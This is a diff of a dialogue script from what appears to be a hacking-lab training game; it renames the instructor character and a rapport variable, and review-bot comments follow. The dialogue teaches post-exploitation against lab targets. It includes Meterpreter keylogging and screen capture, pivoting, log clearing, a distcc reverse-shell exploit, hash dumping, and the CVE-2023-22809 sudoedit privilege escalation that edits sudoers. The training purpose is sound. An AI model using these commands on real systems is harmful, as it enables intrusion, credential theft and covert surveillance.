- Advanced Tactics Instructor: Start by viewing available commands: help + Haxolottle: Start by viewing available commands: help - Advanced Tactics Instructor: Get current privileges: getuid and getprivs + Haxolottle: Get current privileges: getuid and getprivs - Advanced Tactics Instructor: Browse files: ls c:/ (Windows) or ls / (Linux) + Haxolottle: Browse files: ls c:/ (Windows) or ls / (Linux) - Advanced Tactics Instructor: Download files: download /path/to/file + Haxolottle: Download files: download /path/to/file - Advanced Tactics Instructor: Upload files: upload /local/file /remote/file + Haxolottle: Upload files: upload /local/file /remote/file - Advanced Tactics Instructor: View processes: ps + Haxolottle: View processes: ps - Advanced Tactics Instructor: Migrate to another process: migrate PID + Haxolottle: Migrate to another process: migrate PID - Advanced Tactics Instructor: Drop to a system shell: shell (Ctrl-D to return to Meterpreter) + Haxolottle: Drop to a system shell: shell (Ctrl-D to return to Meterpreter) - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 + [How does Meterpreter avoid detection?] 
- Advanced Tactics Instructor: Meterpreter is designed for stealth: + Haxolottle: Meterpreter is designed for stealth: - Advanced Tactics Instructor: It stays in memory and doesn't write files to disk (fileless malware) + Haxolottle: It stays in memory and doesn't write files to disk (fileless malware) - Advanced Tactics Instructor: By default it masquerades as "svchost.exe" on Windows, a common legitimate process + Haxolottle: By default it masquerades as "svchost.exe" on Windows, a common legitimate process - Advanced Tactics Instructor: It can migrate into other running processes, making it hard to identify + Haxolottle: It can migrate into other running processes, making it hard to identify - Advanced Tactics Instructor: Communications are encrypted, making network monitoring less effective + Haxolottle: Communications are encrypted, making network monitoring less effective - Advanced Tactics Instructor: However, modern endpoint detection systems can still identify Meterpreter through behavioral analysis. + Haxolottle: However, modern endpoint detection systems can still identify Meterpreter through behavioral analysis. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 - -> post_exploit_hub === meterpreter_spyware === -Advanced Tactics Instructor: Meterpreter includes features typically associated with spyware - monitoring user activity without their knowledge. +Haxolottle: Meterpreter includes features typically associated with spyware - monitoring user activity without their knowledge. -~ instructor_rapport += 5 +~ haxolottle_rapport += 5 -Advanced Tactics Instructor: These features can capture keystrokes, screenshots, and even webcam feeds. +Haxolottle: These features can capture keystrokes, screenshots, and even webcam feeds. -Advanced Tactics Instructor: While concerning for privacy, they're useful for security testing to demonstrate the risk of compromise. 
+Haxolottle: While concerning for privacy, they're useful for security testing to demonstrate the risk of compromise. + [How does keylogging work in Meterpreter?] - Advanced Tactics Instructor: Meterpreter can capture all keystrokes on the target system. + Haxolottle: Meterpreter can capture all keystrokes on the target system. - Advanced Tactics Instructor: In Armitage: Right-click target → Meterpreter → Explore → Log Keystrokes + Haxolottle: In Armitage: Right-click target → Meterpreter → Explore → Log Keystrokes - Advanced Tactics Instructor: Set CAPTURE_TYPE to "winlogon" to capture login attempts + Haxolottle: Set CAPTURE_TYPE to "winlogon" to capture login attempts - Advanced Tactics Instructor: Via command line: keyscan_start (then keyscan_dump to view results) + Haxolottle: Via command line: keyscan_start (then keyscan_dump to view results) - Advanced Tactics Instructor: This captures everything typed - passwords, emails, documents, searches. + Haxolottle: This captures everything typed - passwords, emails, documents, searches. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 + [How do I capture screenshots?] - Advanced Tactics Instructor: Screenshots show what the user is viewing: + Haxolottle: Screenshots show what the user is viewing: - Advanced Tactics Instructor: screenshot - Captures current screen + Haxolottle: screenshot - Captures current screen - Advanced Tactics Instructor: The image is downloaded to your Kali system and automatically opened + Haxolottle: The image is downloaded to your Kali system and automatically opened - Advanced Tactics Instructor: This can reveal sensitive documents, credentials, or user behavior + Haxolottle: This can reveal sensitive documents, credentials, or user behavior - Advanced Tactics Instructor: In Armitage, there are menu options for screen capture in the Meterpreter menu. + Haxolottle: In Armitage, there are menu options for screen capture in the Meterpreter menu. 
- ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 + [Can I get full graphical control?] - Advanced Tactics Instructor: Yes! You can use VNC for full graphical remote control: + Haxolottle: Yes! You can use VNC for full graphical remote control: - Advanced Tactics Instructor: In Armitage: Right-click target → Meterpreter → Interact → Desktop (VNC) + Haxolottle: In Armitage: Right-click target → Meterpreter → Interact → Desktop (VNC) - Advanced Tactics Instructor: Armitage starts a VNC server on the target and tells you the port + Haxolottle: Armitage starts a VNC server on the target and tells you the port - Advanced Tactics Instructor: Connect with: vncviewer 127.0.0.1:PORT + Haxolottle: Connect with: vncviewer 127.0.0.1:PORT - Advanced Tactics Instructor: You'll see and control the target's desktop just like sitting at their keyboard! + Haxolottle: You'll see and control the target's desktop just like sitting at their keyboard! - Advanced Tactics Instructor: This is powerful but obvious to any user who's watching their screen. + Haxolottle: This is powerful but obvious to any user who's watching their screen. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 - -> post_exploit_hub === pivoting === -Advanced Tactics Instructor: Pivoting means using a compromised system as a stepping stone to attack other systems. +Haxolottle: Pivoting means using a compromised system as a stepping stone to attack other systems. -~ instructor_rapport += 5 +~ haxolottle_rapport += 5 -Advanced Tactics Instructor: Often attackers can't directly reach internal systems - firewalls, NAT, and network segmentation block direct access. +Haxolottle: Often attackers can't directly reach internal systems - firewalls, NAT, and network segmentation block direct access. -Advanced Tactics Instructor: But if you compromise a system that CAN reach those internal systems, you can route your attacks through it. 
+Haxolottle: But if you compromise a system that CAN reach those internal systems, you can route your attacks through it. + [Why would I need to pivot?] - Advanced Tactics Instructor: Several scenarios require pivoting: + Haxolottle: Several scenarios require pivoting: - Advanced Tactics Instructor: Attacking internal systems from a compromised public-facing server + Haxolottle: Attacking internal systems from a compromised public-facing server - Advanced Tactics Instructor: Accessing networks behind firewalls or NAT + Haxolottle: Accessing networks behind firewalls or NAT - Advanced Tactics Instructor: Moving laterally through a corporate network + Haxolottle: Moving laterally through a corporate network - Advanced Tactics Instructor: Hiding your true origin by routing through multiple compromised hosts + Haxolottle: Hiding your true origin by routing through multiple compromised hosts - Advanced Tactics Instructor: In real penetration tests, you often start from a DMZ server and need to pivot to reach critical internal systems. + Haxolottle: In real penetration tests, you often start from a DMZ server and need to pivot to reach critical internal systems. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 + [How does Meterpreter pivoting work?] - Advanced Tactics Instructor: Meterpreter can set up routing so all your attacks go through a compromised host. + Haxolottle: Meterpreter can set up routing so all your attacks go through a compromised host. 
- Advanced Tactics Instructor: In Armitage: Right-click compromised host → Meterpreter → Pivoting → Setup → Add Pivot + Haxolottle: In Armitage: Right-click compromised host → Meterpreter → Pivoting → Setup → Add Pivot - Advanced Tactics Instructor: Via command line, you use the "route" command in msfconsole + Haxolottle: Via command line, you use the "route" command in msfconsole - Advanced Tactics Instructor: Once configured, any Metasploit attacks you launch will be routed through that system + Haxolottle: Once configured, any Metasploit attacks you launch will be routed through that system - Advanced Tactics Instructor: The pivoted attacks will appear to come from the compromised system, not your Kali VM. + Haxolottle: The pivoted attacks will appear to come from the compromised system, not your Kali VM. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 + [What's port forwarding?] - Advanced Tactics Instructor: Port forwarding is a simpler form of pivoting. + Haxolottle: Port forwarding is a simpler form of pivoting. - Advanced Tactics Instructor: You instruct a compromised system to listen on a port and forward connections to a different host and port. + Haxolottle: You instruct a compromised system to listen on a port and forward connections to a different host and port. - Advanced Tactics Instructor: For example, forward local port 8080 to an internal web server on 10.0.0.5:80 + Haxolottle: For example, forward local port 8080 to an internal web server on 10.0.0.5:80 - Advanced Tactics Instructor: This makes the internal service accessible through the compromised system. + Haxolottle: This makes the internal service accessible through the compromised system. 
- Advanced Tactics Instructor: Meterpreter's portfwd command handles this: portfwd add -l 8080 -p 80 -r 10.0.0.5 + Haxolottle: Meterpreter's portfwd command handles this: portfwd add -l 8080 -p 80 -r 10.0.0.5 - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 - -> post_exploit_hub === persistence_evasion === -Advanced Tactics Instructor: Maintaining access and covering tracks are advanced post-exploitation techniques. +Haxolottle: Maintaining access and covering tracks are advanced post-exploitation techniques. -~ instructor_rapport += 5 +~ haxolottle_rapport += 5 -Advanced Tactics Instructor: Persistence means ensuring you can regain access even if the system reboots or the service is restarted. +Haxolottle: Persistence means ensuring you can regain access even if the system reboots or the service is restarted. -Advanced Tactics Instructor: Covering tracks means removing evidence of the attack from logs and the filesystem. +Haxolottle: Covering tracks means removing evidence of the attack from logs and the filesystem. + [How do attackers maintain access?] - Advanced Tactics Instructor: Common persistence mechanisms include: + Haxolottle: Common persistence mechanisms include: - Advanced Tactics Instructor: Creating new user accounts with administrative privileges + Haxolottle: Creating new user accounts with administrative privileges - Advanced Tactics Instructor: Installing backdoors that run on boot (services, scheduled tasks, startup scripts) + Haxolottle: Installing backdoors that run on boot (services, scheduled tasks, startup scripts) - Advanced Tactics Instructor: Modifying SSH authorized_keys to allow your key + Haxolottle: Modifying SSH authorized_keys to allow your key - Advanced Tactics Instructor: Installing rootkits that hide processes and files + Haxolottle: Installing rootkits that hide processes and files - Advanced Tactics Instructor: Meterpreter has post-exploitation modules specifically for persistence. 
+ Haxolottle: Meterpreter has post-exploitation modules specifically for persistence. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 + [How do you cover your tracks?] - Advanced Tactics Instructor: Covering tracks involves removing or modifying evidence: + Haxolottle: Covering tracks involves removing or modifying evidence: - Advanced Tactics Instructor: Clearing log files (on Linux: /var/log/auth.log, /var/log/syslog, etc.) + Haxolottle: Clearing log files (on Linux: /var/log/auth.log, /var/log/syslog, etc.) - Advanced Tactics Instructor: Clearing command history (bash history, PowerShell history) + Haxolottle: Clearing command history (bash history, PowerShell history) - Advanced Tactics Instructor: Removing uploaded tools and malware + Haxolottle: Removing uploaded tools and malware - Advanced Tactics Instructor: Modifying file timestamps to match surrounding files + Haxolottle: Modifying file timestamps to match surrounding files - Advanced Tactics Instructor: However, sophisticated forensics can often detect these modifications. + Haxolottle: However, sophisticated forensics can often detect these modifications. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 + [Does Meterpreter have anti-forensics features?] 
- Advanced Tactics Instructor: Yes, Meterpreter is designed with anti-forensics in mind: + Haxolottle: Yes, Meterpreter is designed with anti-forensics in mind: - Advanced Tactics Instructor: It runs in memory without writing to disk (fileless) + Haxolottle: It runs in memory without writing to disk (fileless) - Advanced Tactics Instructor: It can migrate between processes, making it hard to find + Haxolottle: It can migrate between processes, making it hard to find - Advanced Tactics Instructor: Communications are encrypted + Haxolottle: Communications are encrypted - Advanced Tactics Instructor: There are modules to clear event logs: clearev + Haxolottle: There are modules to clear event logs: clearev - Advanced Tactics Instructor: However, modern endpoint detection and response (EDR) tools can detect Meterpreter through behavioral analysis. + Haxolottle: However, modern endpoint detection and response (EDR) tools can detect Meterpreter through behavioral analysis. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 - -> post_exploit_hub === commands_reference === -Advanced Tactics Instructor: Let me provide a comprehensive post-exploitation commands reference. +Haxolottle: Let me provide a comprehensive post-exploitation commands reference. 
-~ instructor_rapport += 5 +~ haxolottle_rapport += 5 -Advanced Tactics Instructor: **Initial Exploitation (Distcc example):** +Haxolottle: **Initial Exploitation (Distcc example):** -Advanced Tactics Instructor: nmap -p 1-65535 TARGET (scan all ports) +Haxolottle: nmap -p 1-65535 TARGET (scan all ports) -Advanced Tactics Instructor: msfconsole +Haxolottle: msfconsole -Advanced Tactics Instructor: search distccd +Haxolottle: search distccd -Advanced Tactics Instructor: use exploit/unix/misc/distcc_exec +Haxolottle: use exploit/unix/misc/distcc_exec -Advanced Tactics Instructor: set RHOST TARGET_IP +Haxolottle: set RHOST TARGET_IP -Advanced Tactics Instructor: set PAYLOAD cmd/unix/reverse +Haxolottle: set PAYLOAD cmd/unix/reverse -Advanced Tactics Instructor: set LHOST YOUR_IP +Haxolottle: set LHOST YOUR_IP -Advanced Tactics Instructor: exploit +Haxolottle: exploit + [Show me access assessment commands] - Advanced Tactics Instructor: **Assessing Access Level:** + Haxolottle: **Assessing Access Level:** - Advanced Tactics Instructor: whoami (show username) + Haxolottle: whoami (show username) - Advanced Tactics Instructor: id (show UID, GID, groups) + Haxolottle: id (show UID, GID, groups) - Advanced Tactics Instructor: id -u (show just UID - 0 means root) + Haxolottle: id -u (show just UID - 0 means root) - Advanced Tactics Instructor: cat /etc/shadow (try to read - if fails, not root) + Haxolottle: cat /etc/shadow (try to read - if fails, not root) - ~ instructor_rapport += 3 + ~ haxolottle_rapport += 3 + [Show me information gathering commands] - Advanced Tactics Instructor: **Information Gathering (Linux):** + Haxolottle: **Information Gathering (Linux):** - Advanced Tactics Instructor: env (environment variables) + Haxolottle: env (environment variables) - Advanced Tactics Instructor: uname -a (kernel version) + Haxolottle: uname -a (kernel version) - Advanced Tactics Instructor: cat /proc/cpuinfo (CPU info) + Haxolottle: cat /proc/cpuinfo (CPU info) - Advanced 
Tactics Instructor: free -h (memory) + Haxolottle: free -h (memory) - Advanced Tactics Instructor: df -h (disk space) + Haxolottle: df -h (disk space) - Advanced Tactics Instructor: cat /etc/passwd (user accounts) + Haxolottle: cat /etc/passwd (user accounts) - Advanced Tactics Instructor: sudo --version (check for vulnerable sudo) + Haxolottle: sudo --version (check for vulnerable sudo) - Advanced Tactics Instructor: ifconfig or ip a (network interfaces) + Haxolottle: ifconfig or ip a (network interfaces) - ~ instructor_rapport += 3 + ~ haxolottle_rapport += 3 + [Show me privilege escalation commands] - Advanced Tactics Instructor: **Privilege Escalation (CVE-2023-22809):** + Haxolottle: **Privilege Escalation (CVE-2023-22809):** - Advanced Tactics Instructor: EDITOR='cat -- /etc/shadow' sudoedit /etc/hosts + Haxolottle: EDITOR='cat -- /etc/shadow' sudoedit /etc/hosts - Advanced Tactics Instructor: (View password hashes) + Haxolottle: (View password hashes) - Advanced Tactics Instructor: EDITOR='vim -- /etc/sudoers' sudoedit /etc/hosts + Haxolottle: EDITOR='vim -- /etc/sudoers' sudoedit /etc/hosts - Advanced Tactics Instructor: (Edit sudoers file - be very careful!) + Haxolottle: (Edit sudoers file - be very careful!) 
- Advanced Tactics Instructor: In vim: Press Enter, type "Go", press Enter, type "distccd ALL=(ALL) NOPASSWD:ALL" + Haxolottle: In vim: Press Enter, type "Go", press Enter, type "distccd ALL=(ALL) NOPASSWD:ALL" - Advanced Tactics Instructor: Press Esc, type ":x", press Enter, press Esc, type ":q!", press Enter + Haxolottle: Press Esc, type ":x", press Enter, press Esc, type ":q!", press Enter - Advanced Tactics Instructor: sudo -i (escalate to root) + Haxolottle: sudo -i (escalate to root) - ~ instructor_rapport += 3 + ~ haxolottle_rapport += 3 + [Show me Linux admin commands] - Advanced Tactics Instructor: **Linux Post-Exploitation:** + Haxolottle: **Linux Post-Exploitation:** - Advanced Tactics Instructor: useradd USERNAME (create user) + Haxolottle: useradd USERNAME (create user) - Advanced Tactics Instructor: passwd USERNAME (set password) + Haxolottle: passwd USERNAME (set password) - Advanced Tactics Instructor: cat /etc/passwd (list users) + Haxolottle: cat /etc/passwd (list users) - Advanced Tactics Instructor: sh (spawn command interpreter) + Haxolottle: sh (spawn command interpreter) - ~ instructor_rapport += 3 + ~ haxolottle_rapport += 3 + [Show me Metasploit post modules] - Advanced Tactics Instructor: **Metasploit Post-Exploitation:** + Haxolottle: **Metasploit Post-Exploitation:** - Advanced Tactics Instructor: Ctrl-Z (background session) + Haxolottle: Ctrl-Z (background session) - Advanced Tactics Instructor: sessions (list sessions) + Haxolottle: sessions (list sessions) - Advanced Tactics Instructor: use post/linux/gather/checkvm + Haxolottle: use post/linux/gather/checkvm - Advanced Tactics Instructor: setg SESSION 1 + Haxolottle: setg SESSION 1 - Advanced Tactics Instructor: exploit + Haxolottle: exploit - Advanced Tactics Instructor: **Useful Post Modules:** + Haxolottle: **Useful Post Modules:** - Advanced Tactics Instructor: post/linux/gather/enum_configs + Haxolottle: post/linux/gather/enum_configs - Advanced Tactics Instructor: 
post/linux/gather/enum_network + Haxolottle: post/linux/gather/enum_network - Advanced Tactics Instructor: post/linux/gather/enum_system + Haxolottle: post/linux/gather/enum_system - Advanced Tactics Instructor: post/linux/gather/enum_users_history + Haxolottle: post/linux/gather/enum_users_history - Advanced Tactics Instructor: post/linux/gather/hashdump + Haxolottle: post/linux/gather/hashdump - ~ instructor_rapport += 3 + ~ haxolottle_rapport += 3 + [Show me Meterpreter commands] - Advanced Tactics Instructor: **Meterpreter Commands:** + Haxolottle: **Meterpreter Commands:** - Advanced Tactics Instructor: help (list all commands) + Haxolottle: help (list all commands) - Advanced Tactics Instructor: getuid (current user) + Haxolottle: getuid (current user) - Advanced Tactics Instructor: getprivs (privileges) + Haxolottle: getprivs (privileges) - Advanced Tactics Instructor: ls c:/ (browse files) + Haxolottle: ls c:/ (browse files) - Advanced Tactics Instructor: download FILE (download file) + Haxolottle: download FILE (download file) - Advanced Tactics Instructor: upload LOCAL REMOTE (upload file) + Haxolottle: upload LOCAL REMOTE (upload file) - Advanced Tactics Instructor: ps (list processes) + Haxolottle: ps (list processes) - Advanced Tactics Instructor: migrate PID (migrate to process) + Haxolottle: migrate PID (migrate to process) - Advanced Tactics Instructor: shell (drop to system shell, Ctrl-D to return) + Haxolottle: shell (drop to system shell, Ctrl-D to return) - Advanced Tactics Instructor: run post/windows/gather/hashdump (dump hashes) + Haxolottle: run post/windows/gather/hashdump (dump hashes) - Advanced Tactics Instructor: screenshot (capture screen) + Haxolottle: screenshot (capture screen) - Advanced Tactics Instructor: keyscan_start / keyscan_dump (keylogging) + Haxolottle: keyscan_start / keyscan_dump (keylogging) - ~ instructor_rapport += 3 + ~ haxolottle_rapport += 3 + [Show me Armitage commands] - Advanced Tactics Instructor: **Armitage 
Setup:** + Haxolottle: **Armitage Setup:** - Advanced Tactics Instructor: sudo msfdb reinit + Haxolottle: sudo msfdb reinit - Advanced Tactics Instructor: sudo armitage & + Haxolottle: sudo armitage & - Advanced Tactics Instructor: **Armitage Workflow:** + Haxolottle: **Armitage Workflow:** - Advanced Tactics Instructor: Hosts → Add Host → enter IP + Haxolottle: Hosts → Add Host → enter IP - Advanced Tactics Instructor: Right-click host → Scan + Haxolottle: Right-click host → Scan - Advanced Tactics Instructor: Drag exploit onto target icon → Launch + Haxolottle: Drag exploit onto target icon → Launch - Advanced Tactics Instructor: Right-click compromised host → Meterpreter → Interact + Haxolottle: Right-click compromised host → Meterpreter → Interact - Advanced Tactics Instructor: **Pivoting:** + Haxolottle: **Pivoting:** - Advanced Tactics Instructor: Right-click → Meterpreter → Pivoting → Setup → Add Pivot + Haxolottle: Right-click → Meterpreter → Pivoting → Setup → Add Pivot - ~ instructor_rapport += 3 + ~ haxolottle_rapport += 3 - -> post_exploit_hub === challenge_tips === -Advanced Tactics Instructor: Let me give you practical tips for the post-exploitation challenges. +Haxolottle: Let me give you practical tips for the post-exploitation challenges. -~ instructor_rapport += 5 +~ haxolottle_rapport += 5 -Advanced Tactics Instructor: **Exploiting Distcc:** +Haxolottle: **Exploiting Distcc:** -Advanced Tactics Instructor: Scan all ports to find distcc: nmap -p- TARGET +Haxolottle: Scan all ports to find distcc: nmap -p- TARGET -Advanced Tactics Instructor: Use exploit/unix/misc/distcc_exec with cmd/unix/reverse payload +Haxolottle: Use exploit/unix/misc/distcc_exec with cmd/unix/reverse payload -Advanced Tactics Instructor: You'll get a shell as the distccd user, not root. +Haxolottle: You'll get a shell as the distccd user, not root. + [Tips for privilege escalation?] 
- Advanced Tactics Instructor: Check the sudo version immediately: sudo --version + Haxolottle: Check the sudo version immediately: sudo --version - Advanced Tactics Instructor: If it's vulnerable (1.8.0-1.9.12p1), use the CVE-2023-22809 exploit. + Haxolottle: If it's vulnerable (1.8.0-1.9.12p1), use the CVE-2023-22809 exploit. - Advanced Tactics Instructor: When editing /etc/sudoers with vim, follow the commands EXACTLY - one wrong keystroke can break the VM. + Haxolottle: When editing /etc/sudoers with vim, follow the commands EXACTLY - one wrong keystroke can break the VM. - Advanced Tactics Instructor: After editing sudoers, run: sudo -i to become root. + Haxolottle: After editing sudoers, run: sudo -i to become root. - Advanced Tactics Instructor: Verify with: id -u (should show 0) + Haxolottle: Verify with: id -u (should show 0) - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 + [Tips for using post-exploitation modules?] - Advanced Tactics Instructor: Always background your session first with Ctrl-Z + Haxolottle: Always background your session first with Ctrl-Z - Advanced Tactics Instructor: Use "setg SESSION ID" to set the session globally for all modules. + Haxolottle: Use "setg SESSION ID" to set the session globally for all modules. - Advanced Tactics Instructor: Run multiple enum modules to gather comprehensive information. + Haxolottle: Run multiple enum modules to gather comprehensive information. - Advanced Tactics Instructor: The output tells you where loot is stored - check those files! + Haxolottle: The output tells you where loot is stored - check those files! - Advanced Tactics Instructor: Not all modules work perfectly - if one fails, move on to others. + Haxolottle: Not all modules work perfectly - if one fails, move on to others. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 + [Tips for using Meterpreter and Armitage?] - Advanced Tactics Instructor: Exploit the Windows server with easyftp to get a Meterpreter session. 
+ Haxolottle: Exploit the Windows server with easyftp to get a Meterpreter session. - Advanced Tactics Instructor: Use getuid and getprivs to understand your privileges immediately. + Haxolottle: Use getuid and getprivs to understand your privileges immediately. - Advanced Tactics Instructor: Browse to user desktops to find flags: ls C:\\Users\\ + Haxolottle: Browse to user desktops to find flags: ls C:\\Users\\ - Advanced Tactics Instructor: Try both Meterpreter commands and Armitage's GUI features. + Haxolottle: Try both Meterpreter commands and Armitage's GUI features. - Advanced Tactics Instructor: If Meterpreter becomes unresponsive, restart the Windows VM and re-exploit. + Haxolottle: If Meterpreter becomes unresponsive, restart the Windows VM and re-exploit. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 + [Tips for pivoting?] - Advanced Tactics Instructor: Set up a pivot through the Windows system to attack Linux. + Haxolottle: Set up a pivot through the Windows system to attack Linux. - Advanced Tactics Instructor: In Armitage: Right-click Windows → Meterpreter → Pivoting → Setup → Add Pivot + Haxolottle: In Armitage: Right-click Windows → Meterpreter → Pivoting → Setup → Add Pivot - Advanced Tactics Instructor: Add the Linux target: Hosts → Add Hosts → enter Linux IP + Haxolottle: Add the Linux target: Hosts → Add Hosts → enter Linux IP - Advanced Tactics Instructor: Scan and exploit through the pivot - it will be slower but will work. + Haxolottle: Scan and exploit through the pivot - it will be slower but will work. - Advanced Tactics Instructor: The Armitage interface shows the routing path visually. + Haxolottle: The Armitage interface shows the routing path visually. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 + [Where are the flags?] 
- Advanced Tactics Instructor: Linux flags are in user home directories under /home/ + Haxolottle: Linux flags are in user home directories under /home/ - Advanced Tactics Instructor: Use find /home -name "*flag*" to search for them. + Haxolottle: Use find /home -name "*flag*" to search for them. - Advanced Tactics Instructor: Windows flags are on user Desktops: C:\\Users\\USERNAME\\Desktop\\ + Haxolottle: Windows flags are on user Desktops: C:\\Users\\USERNAME\\Desktop\\ - Advanced Tactics Instructor: One Linux challenge involves cracking a protected.zip file. + Haxolottle: One Linux challenge involves cracking a protected.zip file. - Advanced Tactics Instructor: You'll need to dump password hashes and crack them to get the zip password. + Haxolottle: You'll need to dump password hashes and crack them to get the zip password. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 - -> post_exploit_hub === ready_for_practice === -Advanced Tactics Instructor: Excellent! You're ready for advanced post-exploitation techniques. +Haxolottle: Excellent! You're ready for advanced post-exploitation techniques. -~ instructor_rapport += 10 +~ haxolottle_rapport += 10 ~ post_exploit_mastery += 10 -Advanced Tactics Instructor: This lab completes your understanding of the full attack lifecycle - from initial reconnaissance through exploitation to post-exploitation. +Haxolottle: This lab completes your understanding of the full attack lifecycle - from initial reconnaissance through exploitation to post-exploitation. -Advanced Tactics Instructor: You'll exploit systems, escalate privileges, gather sensitive data, and pivot through networks. +Haxolottle: You'll exploit systems, escalate privileges, gather sensitive data, and pivot through networks. -Advanced Tactics Instructor: Remember: these techniques are powerful and potentially destructive. Use them only for authorized penetration testing and defensive security. 
+Haxolottle: Remember: these techniques are powerful and potentially destructive. Use them only for authorized penetration testing and defensive security. + [Any final advice?] - Advanced Tactics Instructor: Work methodically. After each exploitation, assess your access, gather information, then escalate privileges. + Haxolottle: Work methodically. After each exploitation, assess your access, gather information, then escalate privileges. - Advanced Tactics Instructor: Take careful notes of what you find - credentials, software versions, vulnerable services. + Haxolottle: Take careful notes of what you find - credentials, software versions, vulnerable services. - Advanced Tactics Instructor: When using the sudo privilege escalation, follow the vim commands EXACTLY. Practice on a non-critical system first if you're nervous. + Haxolottle: When using the sudo privilege escalation, follow the vim commands EXACTLY. Practice on a non-critical system first if you're nervous. - Advanced Tactics Instructor: Explore both Meterpreter commands and Armitage's interface to see which you prefer. + Haxolottle: Explore both Meterpreter commands and Armitage's interface to see which you prefer. - Advanced Tactics Instructor: Don't get frustrated if something doesn't work - exploit reliability varies. Try restarting VMs and trying again. + Haxolottle: Don't get frustrated if something doesn't work - exploit reliability varies. Try restarting VMs and trying again. - Advanced Tactics Instructor: Most importantly: understand WHY each technique works, not just HOW to execute it. + Haxolottle: Most importantly: understand WHY each technique works, not just HOW to execute it. - Advanced Tactics Instructor: Good luck, Agent {player_name}. This is where you demonstrate the full impact of system compromise. + Haxolottle: Good luck, Agent {player_name}. This is where you demonstrate the full impact of system compromise. 
- ~ instructor_rapport += 10 + ~ haxolottle_rapport += 10 - -> post_exploit_hub
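Review bot: every `~ haxolottle_rapport += 3`, `+= 5` and `+= 10` introduced in these choice blocks (the Linux admin, Metasploit post, Meterpreter and Armitage branches, each challenge_tips branch, and ready_for_practice) depends on the `VAR` declaration at the top of post_exploitation.ink being renamed from `instructor_rapport` in the same commit; that declaration is outside the visible hunks, so please confirm it changed too, since the Ink compiler rejects a reference to an undeclared variable. Leaving `~ post_exploit_mastery += 10` untouched looks intentional and is fine.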
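Review bot: in the Metasploit post-exploitation block the cheat-sheet line `Haxolottle: setg SESSION 1` hardcodes session 1, while the later tip says `Use "setg SESSION ID" to set the session globally for all modules.`; suggest wording the cheat-sheet line so the number is clearly taken from the `sessions` listing shown just above it (e.g. `setg SESSION 1 (use the ID from sessions)`), otherwise learners with several sessions will set the wrong one.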
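Review bot: the Meterpreter block writes `ls c:/ (browse files)` while the Meterpreter/Armitage tips and the flag-location branch use `ls C:\\Users\\` and `C:\\Users\\USERNAME\\Desktop\\`; since this rename touches all of these lines anyway, pick one Windows path notation for the file. If the doubled backslashes are deliberate so that Ink renders them as single ones, a short `//` comment beside the first occurrence would stop the next editor from "fixing" them.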